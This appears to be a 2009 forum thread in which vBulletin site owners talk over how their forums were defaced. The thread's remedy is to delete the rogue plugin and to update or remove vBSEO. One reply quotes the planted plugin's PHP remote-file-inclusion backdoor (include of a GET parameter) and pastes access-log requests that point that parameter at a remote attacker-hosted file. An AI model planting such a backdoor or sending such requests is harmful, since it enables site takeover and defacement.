Hacked by some aljazeer people

[GoPantheoN]

Here its bro

 

[timtamboy63]

reupload your acp directory

 

[GoPantheoN]

hmm re-up my acp is alone enough ?

 

[Sp32]

Yeah, I just messaged saying you should try reuploading admincp folder

 

[GoPantheoN]

ok will do it sp32

 

[Danny.M]

Even if you fix it, he makes a plugin that creates an rfi so he can continue to deface it, key, delete the plugin, remove vbseo (im guessing your running 3.3.x?)

- Danny

 

[GoPantheoN]

ok think i remove vbseo then u mean that i have to continue without any seo ?

also i found a simple seo other that vbseo

edit : i am running vbseo 3.3.x

 

[mourya]

Well i suggest you to put this screenshot in vbulletin.org forum :P if you have a membership account... ( even if you are using a nulled one ) .. i hope they get an idea on how bad their latest releases are..

anyways.. i hope you guys resolve these bad things.. and your forums run as sugar... :D

 

[GoPantheoN]

ty mourya

 

[Danny.M]

update vbseo OR delete, your choice, ive mostly seen this hack on 3.3.0, but some other versions may be vulnerable, go to admincp in vb and go to plugins (not add/remove) and look for one named //// delete it (contents; Echo('<?php include($_GET["alfo"])?>')


// example logs

94.121.10.8 - - [13/Sep/2009:21:10:53 +0000] "GET /forums/ajax.php?alfo=http://cwkodx.by*****arsiv/r.txt? HTTP/1.1" 403 380 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3"
94.121.10.8 - - [13/Sep/2009:21:11:02 +0000] "GET /forums/ajax.php?alfo=http://cwkodx.by*****arsiv/r.txt? HTTP/1.1" 403 380 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3"
94.121.10.8 - - [13/Sep/2009:21:11:02 +0000] "GET /forums/ajax.php?alfo=http://cwkodx.by*****arsiv/r.txt? HTTP/1.1" 403 380 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3"
88.224.253.118 - - [13/Sep/2009:21:11:17 +0000] "GET /forums/ajax.php?alfo=http://cwkodx.by*****arsiv/r.txt? HTTP/1.1" 403 380 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3"
88.224.253.118 - - [13/Sep/2009:21:12:09 +0000] "GET /forums/ajax.php?alfo=http://cwkodx.by*****arsiv/r.txt? HTTP/1.1" 403 380 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3"


Some clients of mine got hacked that's how i saw it.

 

[GoPantheoN]

edit : didnt understand bro

 

[__dark__]

Ipb > vb , sorry to hear you all got hacked but maybe it was time you guys saw the truth , vb aint half as good as ipb in terms of security

 

[Sp32]

kthx for telling us that

 

[Danny.M]

Who are you speaking too? me or the idiot that thinks ipb is better than vb security wise


a few bad plugins is clearly a plugin developer error, not vbulletins.,

 

[Elio]

its ur nooby host probably

 

[Sp32]

Who are you speaking too? me or the idiot that thinks ipb is better than vb security wise


a few bad plugins is clearly a plugin developer error, not vbulletins.,

I was speaking to the ipb person


also @ Elio people from different server got hacked as well <3

 

[__dark__]

I wont waste my breath on you danny

 

[Grinder]

I got hacked too and I am running phpbb 3

And now what kind of template do I have to edit to remove their message that they where on my board ? Any help would do just fine

 

[Sønic]

No ipb sites yet ? Hmmm....

Anyway, hope you guys get this sorted.

 

[IndianHeartz]

my sites was also hacked last week m using VB,